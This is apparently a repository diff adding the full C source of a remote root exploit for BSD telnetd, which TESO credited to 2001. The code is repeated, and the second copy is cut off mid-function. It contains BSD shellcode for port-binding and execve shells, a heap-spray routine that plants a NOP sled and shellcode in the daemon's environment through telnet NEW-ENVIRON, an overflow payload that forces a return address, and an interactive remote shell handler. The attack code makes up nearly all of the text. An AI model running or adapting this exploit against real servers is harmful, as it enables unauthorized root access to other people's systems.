"\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5" + /* ^^ ^^ port */ + "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a" + "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a" + "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73" + "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd" + "\x80"; + +/* x86/bsd PIC execve shellcode + * by lorian/teso + */ +unsigned char x86_bsd_execvesh[] = + "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68" + "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"; + +/* x86/bsd(i)+solaris execve shellcode + * by lorian/teso + */ +unsigned char x86_bsd_compaexec[] = + "\xbf\xee\xee\xee\x08\xb8\xff\xf8\xff\x3c\xf7\xd0" + "\xfd\xab\x31\xc0\x99\xb0\x9a\xab\xfc\xab\xb0\x3b" + "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" + "\xe3\x52\x53\x89\xe1\x52\x51\x53\xff\xd7"; + + +unsigned char * shellcode = x86_bsd_compaexec; + + +#define COL 55 + + +void +usage (char *progname) +{ + fprintf (stderr, "usage: %s [-n ] [-c] [-f] \n\n", progname); + fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n" + "-c\tcheck exploitability only, do not exploit\n" + "-f\tforce mode, override check results\n\n"); + fprintf (stderr, "WARNING: this is no easy exploit, we have to get things tightly aligned and\n" + "send 16/34mb of traffic to the remote telnet daemon. it might not be able to\n" + "take that, or it will take very long for it (> 1h). beware.\n\n"); + + fprintf (stderr, "tested:\tFreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE \n" + "\tNetBSD 1.5\n" + "\tBSDI BSD/OS 4.1\n\n"); + + exit (EXIT_FAILURE); +} + +int +main (int argc, char *argv[]) +{ + char c; + char * progname; + char * dest; + int i, j, fd, + dots = 0; + int popc; + struct timeval start, + cur; + unsigned long long int g_pct, /* gaussian percentage */ + g_all; /* gaussian overall */ + + + fprintf (stderr, "7350854 - x86/bsd telnetd remote root\n" + "by zip, lorian, smiler and scut.\n\n"); + + progname = argv[0]; + if (argc < 2) + usage (progname); + + + while ((c = getopt (argc, argv, "n:cf")) != EOF) { + switch (c) { + case 'n': + num = atoi (optarg); + break; + case 'c': + checkonly = 1; + break; + case 'f': + force = 1; + break; + default: + usage (progname); + break; + } + } + + dest = argv[argc - 1]; + if (dest[0] == '-') + usage (progname); + + fd = net_connect (NULL, dest, 23, 20); + if (fd <= 0) { + fprintf (stderr, "failed to connect\n"); + exit (EXIT_FAILURE); + } + + random_init (); + + if (xp_check (fd) == 0 && force == 0) { + printf ("aborting\n"); +#ifndef DEBUG + exit (EXIT_FAILURE); +#endif + } + close (fd); + + if (checkonly) + exit (EXIT_SUCCESS); + + fd = net_connect (NULL, dest, 23, 20); + if (fd <= 0) { + fprintf (stderr, "failed to connect the second time\n"); + exit (EXIT_FAILURE); + } + + printf ("\n#############################################################################\n\n"); + printf ("ok baby, times are rough, we send %dmb traffic to the remote\n" + "telnet daemon process, it will spill badly. but then, there is no\n" + "other way, sorry...\n\n", mode); + +#ifdef DEBUG + getchar (); +#endif + printf ("## setting populators to populate heap address space\n"); + + g_all = ((unsigned long long int)(pop / 2)) * + ((unsigned long long int)(pop + 1)); + g_pct = 0; + + printf ("## number of setenvs (dots / network): %d\n", pop); + printf ("## number of walks (percentage / cpu): %Lu\n", g_all); + printf ("##\n"); + printf ("## the percentage is more realistic than the dots ;)\n"); + printf ("\n"); + printf ("percent |"); + + popc = pop / COL; + for (i = pop / popc ; i >= 0 ; --i) + printf ("-"); + printf ("| ETA |\n"); + + gettimeofday (&start, NULL); + + for (walk = 0 ; walk < pop ; ++walk) { + xp_pop (fd); + + g_pct += walk; + + if (walk % popc == 0) + dots += 1; + + if (walk % 200 == 0) { + int pct; + float pct_f; + unsigned long int diff; + + pct = (int) ((g_pct * 100) / g_all); + pct_f = g_pct * 100; + pct_f /= (float) g_all; + + /* calculate difference not caring about accuracy */ + gettimeofday (&cur, NULL); + diff = cur.tv_sec - start.tv_sec; + + printf ((pct == 100) ? "\r%3.2f%% |" : ((pct / 10) ? + "\r %2.2f%% |" : "\r %1.2f%% |"), pct_f); + for (j = 0 ; j < dots ; ++j) + printf ("."); + for ( ; j <= COL ; ++j) + printf (" "); + + if (pct != 0) { + diff = (int) ((((float)(100 - pct_f)) / + (float) pct_f) * diff); + printf ("| %02lu:%02lu:%02lu |", + diff / 3600, (diff % 3600) / 60, + diff % 60); + } else { + printf ("| --:--:-- |"); + } + + fflush (stdout); + } + } + printf ("\n\n"); + + printf ("## sleeping for 10 seconds to let the process recover\n"); + sleep (10); + +#ifdef DEBUG + getchar (); +#endif + /* return into 0x08feff0a */ + xp (fd); + sleep (1); + + printf ("## ok, you should now have a root shell\n"); + printf ("## as always, after hard times, there is a reward...\n"); + printf ("\n\ncommand: "); + fflush (stdout); + + shell (fd); + + exit (EXIT_SUCCESS); +} + + +void +xp (int fd) +{ + int n; + unsigned char buf[2048]; + + + /* basic overflow */ + for (n = bs ; n < sizeof (buf) ; ++n) + buf[n] = (n - bs) % 2 ? '\xf6' : '\xff'; + + /* some nifty alignment */ + buf[0] = '\xff'; /* IAC */ + buf[1] = '\xf5'; /* AO */ + + if (mode == 16) { + buf[2] = '\xff'; /* IAC */ + buf[3] = '\xfb'; /* WILL */ + buf[4] = '\x26'; /* ENCRYPTION */ + } + + /* force 0x08feff0a as return */ + buf[num++] = '\xff'; + buf[num++] = '\xfb'; + buf[num++] = '\x08'; + + /* and the output_encrypt overwrite action, yay! */ + buf[num++] = '\xff'; + buf[num++] = '\xf6'; + + /* XXX: should not fail here, though we should better loop and check */ + n = send (fd, buf, num, 0); + if (n != num) { + perror ("xp:send"); + } +} + + +#ifdef INSANE_MIND + +void +xp_shrinkwin (int fd) +{ + int n; + int iobc; + int p = 0; + unsigned char buf[2048]; + char c; + int val; + int len; + + for (n = 0 ; n < sizeof (buf) ; ++n) + buf[n] = n % 2 ? '\xf6' : '\xff'; + + len = sizeof (val); + getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len); + printf ("SO_SNDLOWAT = %d\n", val); + val = 1; + printf ("setsockopt: %s\n", + setsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, sizeof(val)) ? + "FAILED" : "SUCCESS"); + val = 1234; + getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len); + printf ("SO_SNDLOWAT = %d\n", val); + + getchar(); + while (1) { + if (p > 105) + c = getchar(); + if (c == 'r') { + getchar(); + read (fd, &buf[1024], 384); + } else if (c == 'o') { + getchar(); + send (fd, "7", 1, MSG_OOB); + } else if (c != 'r') { + usleep(100000); + n = send (fd, buf, 112, 0); + ioctl (fd, FIONREAD, &iobc); + len = sizeof (val); + getsockopt (fd, SOL_SOCKET, SO_RCVBUF, &val, &len); + printf ("%02d. send: %d local: %d/%d (%d left)\n", + ++p, n, iobc, val, val - iobc); + } + } +} +#endif + + +/* xp_pop - populator function + * + * causes remote telnet daemon to setenv() variables with our content, populating + * the heap with shellcode. this will get us more nopspace and place our shellcode + * where the nice addresses are, that we can create by writing telnet option + * strings. + * + * XXX: there seems to be a maximum size for the environment value you can set, + * which is 510. we use 496 bytes for nopspace and shellcode therefore. + * should work, rather similar to tsig tcp/malloc exploitation. -sc + */ + +void +xp_pop (int fd) +{ + unsigned char var[16]; + unsigned char storebuf[496]; + sprintf (var, "%06x", walk); +#ifdef DEBUG + memset (storebuf, '\xcc', sizeof (storebuf)); +#else +/* memset (storebuf, '\x90', sizeof (storebuf)); */ + x86_nop (storebuf, sizeof (storebuf), "\x00\x01\x02\x03\xff", 5); + memcpy (storebuf + sizeof (storebuf) - strlen (shellcode) - 1, + shellcode, strlen (shellcode)); +#endif + storebuf[sizeof (storebuf) - 1] = '\0'; + + xp_setenv (fd, var, storebuf); +} + + +void +xp_setenv (int fd, unsigned char *var, unsigned char *val) +{ + int n = 0; + unsigned char buf[2048]; + + buf[n++] = IAC; + buf[n++] = SB; + buf[n++] = TELOPT_NEW_ENVIRON; + buf[n++] = TELQUAL_IS; + buf[n++] = ENV_USERVAR; + + /* should not contain < 0x04 */ + while (*var) { + if (*var == IAC) + buf[n++] = *var; + buf[n++] = *var++; + } + buf[n++] = NEW_ENV_VALUE; + while (*val) { + if (*val == IAC) + buf[n++] = *val; + buf[n++] = *val++; + } + buf[n++] = IAC; + buf[n++] = SE; + + if (send (fd, buf, n, 0) != n) { + perror ("xp_setenv:send"); + exit (EXIT_FAILURE); + } +} + + +int +xp_check (int fd) +{ + int n; + unsigned int expect_len = 15; + unsigned char expected[] = + "\x0d\x0a\x5b\x59\x65\x73\x5d\x0d\x0a\xff\xfe\x08\xff\xfd\x26"; + /* \r \n [ Y e s ] \r \n IAC DONT 08 IAC DO 26*/ + unsigned int additional_len = 8; + unsigned char additional[] = + "\xff\xfa\x26\x01\x01\x02\xff\xf0"; + /*IAC SB ENC ........... IAC SE */ + + unsigned char buf[128]; + + read (fd, buf, sizeof (buf)); + + n = 0; + buf[n++] = IAC; /* 0xff */ + buf[n++] = AYT; /* 0xf6 */ + + buf[n++] = IAC; /* 0xff */ + buf[n++] = WILL; /* 0xfb */ + buf[n++] = TELOPT_NAOL; /* 0x08 */ + + buf[n++] = IAC; /* 0xff */ + buf[n++] = WILL; /* 0xfb */ + buf[n++] = TELOPT_ENCRYPT; /* 0x26 */ + +#ifdef DEBUG + hexdump ("check send buffer", buf, n); +#endif + if (send (fd, buf, n, 0) != n) { + perror ("xp_check:send"); + exit (EXIT_FAILURE); + } + + n = read (fd, buf, sizeof (buf)); +#ifdef DEBUG + hexdump ("check recv buffer", buf, n); +#endif + + if (memcmp (buf, expected, expect_len) == 0) { + if (memcmp (buf+expect_len, additional, additional_len) == 0) { + mode = 16; + } else { + mode = 34; + bs = bs34; + } + printf ("check: PASSED, using %dmb mode\n", mode); + + return (1); + } + + printf ("check: FAILED\n"); + + return (0); +} + + +void +shell (int sock) +{ + int l; + char buf[512]; + fd_set rfds; + + + while (1) { + FD_SET (0, &rfds); + FD_SET (sock, &rfds); + + select (sock + 1, &rfds, NULL, NULL, NULL); + if (FD_ISSET (0, &rfds)) { + l = read (0, buf, sizeof (buf)); + if (l <= 0) { + perror ("read user"); + exit (EXIT_FAILURE); + } + write (sock, buf, l); + } + + if (FD_ISSET (sock, &rfds)) { + l = read (sock, buf, sizeof (buf)); + if (l <= 0) { + perror ("read remote"); + exit (EXIT_FAILURE); + } + write (1, buf, l); + } + } +} + + +/* ripped from zodiac */ +void +hexdump (char *desc, unsigned char *data, unsigned int amount) +{ + unsigned int dp, p; /* data pointer */ + const char trans[] = + "................................ !\"#$%&'()*+,-./0123456789" + ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm" + "nopqrstuvwxyz{|}~...................................." + "....................................................." + "........................................"; + + + printf ("/* %s, %u bytes */\n", desc, amount); + + for (dp = 1; dp <= amount; dp++) { + fprintf (stderr, "%02x ", data[dp-1]); + if ((dp % 8) == 0) + fprintf (stderr, " "); + if ((dp % 16) == 0) { + fprintf (stderr, "| "); + p = dp; + for (dp -= 16; dp < p; dp++) + fprintf (stderr, "%c", trans[data[dp]]); + fflush (stderr); + fprintf (stderr, "\n"); + } + fflush (stderr); + } + if ((amount % 16) != 0) { + p = dp = 16 - (amount % 16); + for (dp = p; dp > 0; dp--) { + fprintf (stderr, " "); + if (((dp % 8) == 0) && (p != 8)) + fprintf (stderr, " "); + fflush (stderr); + } + fprintf (stderr, " | "); + for (dp = (amount - (16 - p)); dp < amount; dp++) + fprintf (stderr, "%c", trans[data[dp]]); + fflush (stderr); + } + fprintf (stderr, "\n"); + + return; +} + + + +unsigned long int +net_resolve (char *host) +{ + long i; + struct hostent *he; + + i = inet_addr(host); + if (i == -1) { + he = gethostbyname(host); + if (he == NULL) { + return (0); + } else { + return (*(unsigned long *) he->h_addr); + } + } + return (i); +} + + +int +net_connect (struct sockaddr_in *cs, char *server, + unsigned short int port, int sec) +{ + int n, + len, + error, + flags; + int fd; + struct timeval tv; + fd_set rset, wset; + struct sockaddr_in csa; + + if (cs == NULL) + cs = &csa; + + /* first allocate a socket */ + cs->sin_family = AF_INET; + cs->sin_port = htons (port); + fd = socket (cs->sin_family, SOCK_STREAM, 0); + if (fd == -1) + return (-1); + + if (!(cs->sin_addr.s_addr = net_resolve (server))) { + close (fd); + return (-1); + } + + flags = fcntl (fd, F_GETFL, 0); + if (flags == -1) { + close (fd); + return (-1); + } + n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); + if (n == -1) { + close (fd); + return (-1); + } + + error = 0; + + n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); + if (n < 0) { + if (errno != EINPROGRESS) { + close (fd); + return (-1); + } + } + if (n == 0) + goto done; + + FD_ZERO(&rset); + FD_ZERO(&wset); + FD_SET(fd, &rset); + FD_SET(fd, &wset); + tv.tv_sec = sec; + tv.tv_usec = 0; + + n = select(fd + 1, &rset, &wset, NULL, &tv); + if (n == 0) { + close(fd); + errno = ETIMEDOUT; + return (-1); + } + if (n == -1) + return (-1); + + if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { + if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { + len = sizeof(error); + if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { + errno = ETIMEDOUT; + return (-1); + } + if (error == 0) { + goto done; + } else { + errno = error; + return (-1); + } + } + } else + return (-1); + +done: + n = fcntl(fd, F_SETFL, flags); + if (n == -1) + return (-1); + return (fd); +} + + +/* imported from shellkit */ + +unsigned long int +random_get (unsigned long int low, unsigned long int high) +{ + unsigned long int val; + + if (low > high) { + low ^= high; + high ^= low; + low ^= high; + } + + val = (unsigned long int) random (); + val %= (high - low); + val += low; + + return (val); +} + + +void +random_init (void) +{ + srandom (time (NULL)); +} + + +int +bad (unsigned char u) +{ + if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25') + return (1); + + return (0); +} + +int +badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len) +{ + int n; + + for (code_len -= 1 ; code_len >= 0 ; --code_len) { + for (n = 0 ; n < bad_len ; ++n) + if (code[code_len] == bad[n]) + return (1); + } + + return (0); +} + +unsigned long int +x86_nop_rwreg (void) +{ + unsigned long int reg; + + do { + reg = random_get (0, 7); + } while (reg == 4); /* 4 = $esp */ + + return (reg); +} + + + +unsigned long int +x86_nop_xfer (char *xferstr) +{ + int bw = 0; /* bitfield walker */ + unsigned char tgt; /* resulting instruction */ + + /* in a valid xferstr we trust */ + for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) { + switch (xferstr[0]) { + case ('0'): + BSET (tgt, 1, 0, bw); + break; + case ('1'): + BSET (tgt, 1, 1, bw); + break; + case ('r'): + BSET (tgt, 3, x86_nop_rwreg (), bw); + break; + case ('.'): + break; /* ignore */ + default: + fprintf (stderr, "on steroids, huh?\n"); + exit (EXIT_FAILURE); + break; + } + } + + if (bw != 8) { + fprintf (stderr, "invalid bitwalker: bw = %d\n", bw); + exit (EXIT_FAILURE); + } + + return (tgt); +} + + +unsigned int +x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len) +{ + int walk; + int bcount; /* bad counter */ + char * xs; + char * xferstr[] = { + "0011.0111", /* aaa */ + "0011.1111", /* aas */ + "1001.1000", /* cbw */ + "1001.1001", /* cdq */ + "1111.1000", /* clc */ + "1111.1100", /* cld */ + "1111.0101", /* cmc */ + "0010.0111", /* daa */ + "0010.1111", /* das */ + "0100.1r", /* dec */ + "0100.0r", /* inc */ + "1001.1111", /* lahf */ + "1001.0000", /* nop */ + "1111.1001", /* stc */ + "1111.1101", /* std */ + "1001.0r", /* xchg al, */ + NULL, + }; + unsigned char tgt; + + + for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) { + /* avoid endless loops on excessive badlisting */ + for (bcount = 0 ; bcount < 16384 ; ++bcount) { + xs = xferstr[random_get (0, 15)]; + tgt = x86_nop_xfer (xs); + + dest[walk] = tgt; + if (badstr (&dest[walk], 1, bad, bad_len) == 0) + break; + } + + /* should not happen */ + if (bcount >= 16384) { + fprintf (stderr, "too much blacklisting, giving up...\n"); + exit (EXIT_FAILURE); + } + } + + return (walk); +} + + diff --git a/exploits/7350854/7350854.c b/exploits/7350854/7350854.c new file mode 100644 index 0000000..95dd740 --- /dev/null +++ b/exploits/7350854/7350854.c @@ -0,0 +1,877 @@ +/* 7350854 - x86/bsd telnetd remote root exploit + * + * TESO CONFIDENTIAL - SOURCE MATERIALS + * + * This is unpublished proprietary source code of TESO Security. + * + * The contents of these coded instructions, statements and computer + * programs may not be disclosed to third parties, copied or duplicated in + * any form, in whole or in part, without the prior written permission of + * TESO Security. This includes especially the Bugtraq mailing list, the + * www.hack.co.za website and any public exploit archive. + * + * (C) COPYRIGHT TESO Security, 2001 + * All Rights Reserved + * + ***************************************************************************** + * bug found by scut 2001/06/09 + * further research by smiler, zip, lorian and me. + * thanks to zip's cool friend for giving me a testbed to play on + * + * tested against: BSDI BSD/OS 4.1 + * NetBSD 1.5 + * FreeBSD 3.1 + * FreeBSD 4.0-REL + * FreeBSD 4.2-REL + * FreeBSD 4.3-BETA + * FreeBSD 4.3-STABLE + * FreeBSD 4.3-RELEASE + * + */ + +#define VERSION "0.0.7" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +/* global variables, uhhohh! + */ +int mode = 16; +int num = 245; +int pop = 31500; /* puts code at 0x08fdff0a */ +int bs = 1; /* buffer start */ + +int num34 = 244; +int pop34 = 71833; /* puts code at 0x0a0d08fe */ +int bs34 = 0; + +int walk; /* populator walker */ +int force = 0; /* force exploitation */ +int checkonly = 0; /* check telnetd only */ + + +void usage (char *progname); +int xp_check (int fd); +void xp_pop (int fd); +void xp_shrinkwin (int fd); +void xp_setenv (int fd, unsigned char *var, unsigned char *val); +void xp (int fd); +void shell (int sock); +void hexdump (char *desc, unsigned char *data, unsigned int amount); + +/* imported from shellkit */ +unsigned long int random_get (unsigned long int low, unsigned long int high); +void random_init (void); +int bad (unsigned char u); +int badstr (unsigned char *code, int code_len, unsigned char *bad, + int bad_len); +unsigned long int x86_nop_rwreg (void); +unsigned long int x86_nop_xfer (char *xferstr); +unsigned int x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len); + +#define BSET(dest, len, val, bw) { \ + dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \ + dest |= val << (8 - bw - len); /* set value bits */ \ + bw += len; \ +} + +/* imported from network.c */ +#define NET_CONNTIMEOUT 60 +int net_conntimeout = NET_CONNTIMEOUT; + +unsigned long int net_resolve (char *host); +int net_connect (struct sockaddr_in *cs, char *server, + unsigned short int port, int sec); + + +/* x86/bsd PIC portshell shellcode + * by lorian/teso + * port 0x4444 (might want to change it here) + */ +unsigned char x86_bsd_portshell[] = + "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53" + "\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5" + /* ^^ ^^ port */ + "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a" + "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a" + "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73" + "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd" + "\x80"; + +/* x86/bsd PIC execve shellcode + * by lorian/teso + */ +unsigned char x86_bsd_execvesh[] = + "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68" + "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"; + +/* x86/bsd(i)+solaris execve shellcode + * by lorian/teso + */ +unsigned char x86_bsd_compaexec[] = + "\xbf\xee\xee\xee\x08\xb8\xff\xf8\xff\x3c\xf7\xd0" + "\xfd\xab\x31\xc0\x99\xb0\x9a\xab\xfc\xab\xb0\x3b" + "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" + "\xe3\x52\x53\x89\xe1\x52\x51\x53\xff\xd7"; + + +unsigned char * shellcode = x86_bsd_compaexec; + + +#define COL 55 + + +void +usage (char *progname) +{ + fprintf (stderr, "usage: %s [-n ] [-c] [-f] \n\n", progname); + fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n" + "-c\tcheck exploitability only, do not exploit\n" + "-f\tforce mode, override check results\n\n"); + fprintf (stderr, "WARNING: this is no easy exploit, we have to get things tightly aligned and\n" + "send 16/34mb of traffic to the remote telnet daemon. it might not be able to\n" + "take that, or it will take very long for it (> 1h). beware.\n\n"); + + fprintf (stderr, "tested:\tFreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE \n" + "\tNetBSD 1.5\n" + "\tBSDI BSD/OS 4.1\n\n"); + + exit (EXIT_FAILURE); +} + +int +main (int argc, char *argv[]) +{ + char c; + char * progname; + char * dest; + int i, j, fd, + dots = 0; + int popc; + struct timeval start, + cur; + unsigned long long int g_pct, /* gaussian percentage */ + g_all; /* gaussian overall */ + + + fprintf (stderr, "7350854 - x86/bsd telnetd remote root\n" + "by zip, lorian, smiler and scut.\n\n"); + + progname = argv[0]; + if (argc < 2) + usage (progname); + + + while ((c = getopt (argc, argv, "n:cf")) != EOF) { + switch (c) { + case 'n': + num = atoi (optarg); + break; + case 'c': + checkonly = 1; + break; + case 'f': + force = 1; + break; + default: + usage (progname); + break; + } + } + + dest = argv[argc - 1]; + if (dest[0] == '-') + usage (progname); + + fd = net_connect (NULL, dest, 23, 20); + if (fd <= 0) { + fprintf (stderr, "failed to connect\n"); + exit (EXIT_FAILURE); + } + + random_init (); + + if (xp_check (fd) == 0 && force == 0) { + printf ("aborting\n"); +#ifndef DEBUG + exit (EXIT_FAILURE); +#endif + } + close (fd); + + if (checkonly) + exit (EXIT_SUCCESS); + + fd = net_connect (NULL, dest, 23, 20); + if (fd <= 0) { + fprintf (stderr, "failed to connect the second time\n"); + exit (EXIT_FAILURE); + } + + printf ("\n#############################################################################\n\n"); + printf ("ok baby, times are rough, we send %dmb traffic to the remote\n" + "telnet daemon process, it will spill badly. but then, there is no\n" + "other way, sorry...\n\n", mode); + +#ifdef DEBUG + getchar (); +#endif + printf ("## setting populators to populate heap address space\n"); + + g_all = ((unsigned long long int)(pop / 2)) * + ((unsigned long long int)(pop + 1)); + g_pct = 0; + + printf ("## number of setenvs (dots / network): %d\n", pop); + printf ("## number of walks (percentage / cpu): %Lu\n", g_all); + printf ("##\n"); + printf ("## the percentage is more realistic than the dots ;)\n"); + printf ("\n"); + printf ("percent |"); + + popc = pop / COL; + for (i = pop / popc ; i >= 0 ; --i) + printf ("-"); + printf ("| ETA |\n"); + + gettimeofday (&start, NULL); + + for (walk = 0 ; walk < pop ; ++walk) { + xp_pop (fd); + + g_pct += walk; + + if (walk % popc == 0) + dots += 1; + + if (walk % 200 == 0) { + int pct; + float pct_f; + unsigned long int diff; + + pct = (int) ((g_pct * 100) / g_all); + pct_f = g_pct * 100; + pct_f /= (float) g_all; + + /* calculate difference not caring about accuracy */ + gettimeofday (&cur, NULL); + diff = cur.tv_sec - start.tv_sec; + + printf ((pct == 100) ? "\r%3.2f%% |" : ((pct / 10) ? + "\r %2.2f%% |" : "\r %1.2f%% |"), pct_f); + for (j = 0 ; j < dots ; ++j) + printf ("."); + for ( ; j <= COL ; ++j) + printf (" "); + + if (pct != 0) { + diff = (int) ((((float)(100 - pct_f)) / + (float) pct_f) * diff); + printf ("| %02lu:%02lu:%02lu |", + diff / 3600, (diff % 3600) / 60, + diff % 60); + } else { + printf ("| --:--:-- |"); + } + + fflush (stdout); + } + } + printf ("\n\n"); + + printf ("## sleeping for 10 seconds to let the process recover\n"); + sleep (10); + +#ifdef DEBUG + getchar (); +#endif + /* return into 0x08feff0a */ + xp (fd); + sleep (1); + + printf ("## ok, you should now have a root shell\n"); + printf ("## as always, after hard times, there is a reward...\n"); + printf ("\n\ncommand: "); + fflush (stdout); + + shell (fd); + + exit (EXIT_SUCCESS); +} + + +void +xp (int fd) +{ + int n; + unsigned char buf[2048]; + + + /* basic overflow */ + for (n = bs ; n < sizeof (buf) ; ++n) + buf[n] = (n - bs) % 2 ? '\xf6' : '\xff'; + + /* some nifty alignment */ + buf[0] = '\xff'; /* IAC */ + buf[1] = '\xf5'; /* AO */ + + if (mode == 16) { + buf[2] = '\xff'; /* IAC */ + buf[3] = '\xfb'; /* WILL */ + buf[4] = '\x26'; /* ENCRYPTION */ + } + + /* force 0x08feff0a as return */ + buf[num++] = '\xff'; + buf[num++] = '\xfb'; + buf[num++] = '\x08'; + + /* and the output_encrypt overwrite action, yay! */ + buf[num++] = '\xff'; + buf[num++] = '\xf6'; + + /* XXX: should not fail here, though we should better loop and check */ + n = send (fd, buf, num, 0); + if (n != num) { + perror ("xp:send"); + } +} + + +#ifdef INSANE_MIND + +void +xp_shrinkwin (int fd) +{ + int n; + int iobc; + int p = 0; + unsigned char buf[2048]; + char c; + int val; + int len; + + for (n = 0 ; n < sizeof (buf) ; ++n) + buf[n] = n % 2 ? '\xf6' : '\xff'; + + len = sizeof (val); + getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len); + printf ("SO_SNDLOWAT = %d\n", val); + val = 1; + printf ("setsockopt: %s\n", + setsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, sizeof(val)) ? + "FAILED" : "SUCCESS"); + val = 1234; + getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len); + printf ("SO_SNDLOWAT = %d\n", val); + + getchar(); + while (1) { + if (p > 105) + c = getchar(); + if (c == 'r') { + getchar(); + read (fd, &buf[1024], 384); + } else if (c == 'o') { + getchar(); + send (fd, "7", 1, MSG_OOB); + } else if (c != 'r') { + usleep(100000); + n = send (fd, buf, 112, 0); + ioctl (fd, FIONREAD, &iobc); + len = sizeof (val); + getsockopt (fd, SOL_SOCKET, SO_RCVBUF, &val, &len); + printf ("%02d. send: %d local: %d/%d (%d left)\n", + ++p, n, iobc, val, val - iobc); + } + } +} +#endif + + +/* xp_pop - populator function + * + * causes remote telnet daemon to setenv() variables with our content, populating + * the heap with shellcode. this will get us more nopspace and place our shellcode + * where the nice addresses are, that we can create by writing telnet option + * strings. + * + * XXX: there seems to be a maximum size for the environment value you can set, + * which is 510. we use 496 bytes for nopspace and shellcode therefore. + * should work, rather similar to tsig tcp/malloc exploitation. -sc + */ + +void +xp_pop (int fd) +{ + unsigned char var[16]; + unsigned char storebuf[496]; + sprintf (var, "%06x", walk); +#ifdef DEBUG + memset (storebuf, '\xcc', sizeof (storebuf)); +#else +/* memset (storebuf, '\x90', sizeof (storebuf)); */ + x86_nop (storebuf, sizeof (storebuf), "\x00\x01\x02\x03\xff", 5); + memcpy (storebuf + sizeof (storebuf) - strlen (shellcode) - 1, + shellcode, strlen (shellcode)); +#endif + storebuf[sizeof (storebuf) - 1] = '\0'; + + xp_setenv (fd, var, storebuf); +} + + +void +xp_setenv (int fd, unsigned char *var, unsigned char *val) +{ + int n = 0; + unsigned char buf[2048]; + + buf[n++] = IAC; + buf[n++] = SB; + buf[n++] = TELOPT_NEW_ENVIRON; + buf[n++] = TELQUAL_IS; + buf[n++] = ENV_USERVAR; + + /* should not contain < 0x04 */ + while (*var) { + if (*var == IAC) + buf[n++] = *var; + buf[n++] = *var++; + } + buf[n++] = NEW_ENV_VALUE; + while (*val) { + if (*val == IAC) + buf[n++] = *val; + buf[n++] = *val++; + } + buf[n++] = IAC; + buf[n++] = SE; + + if (send (fd, buf, n, 0) != n) { + perror ("xp_setenv:send"); + exit (EXIT_FAILURE); + } +} + + +int +xp_check (int fd) +{ + int n; + unsigned int expect_len = 15; + unsigned char expected[] = + "\x0d\x0a\x5b\x59\x65\x73\x5d\x0d\x0a\xff\xfe\x08\xff\xfd\x26"; + /* \r \n [ Y e s ] \r \n IAC DONT 08 IAC DO 26*/ + unsigned int additional_len = 8; + unsigned char additional[] = + "\xff\xfa\x26\x01\x01\x02\xff\xf0"; + /*IAC SB ENC ........... IAC SE */ + + unsigned char buf[128]; + + read (fd, buf, sizeof (buf)); + + n = 0; + buf[n++] = IAC; /* 0xff */ + buf[n++] = AYT; /* 0xf6 */ + + buf[n++] = IAC; /* 0xff */ + buf[n++] = WILL; /* 0xfb */ + buf[n++] = TELOPT_NAOL; /* 0x08 */ + + buf[n++] = IAC; /* 0xff */ + buf[n++] = WILL; /* 0xfb */ + buf[n++] = TELOPT_ENCRYPT; /* 0x26 */ + +#ifdef DEBUG + hexdump ("check send buffer", buf, n); +#endif + if (send (fd, buf, n, 0) != n) { + perror ("xp_check:send"); + exit (EXIT_FAILURE); + } + + n = read (fd, buf, sizeof (buf)); +#ifdef DEBUG + hexdump ("check recv buffer", buf, n); +#endif + + if (memcmp (buf, expected, expect_len) == 0) { + if (memcmp (buf+expect_len, additional, additional_len) == 0) { + mode = 16; + } else { + mode = 34; + bs = bs34; + } + printf ("check: PASSED, using %dmb mode\n", mode); + + return (1); + } + + printf ("check: FAILED\n"); + + return (0); +} + + +void +shell (int sock) +{ + int l; + char buf[512]; + fd_set rfds; + + + while (1) { + FD_SET (0, &rfds); + FD_SET (sock, &rfds); + + select (sock + 1, 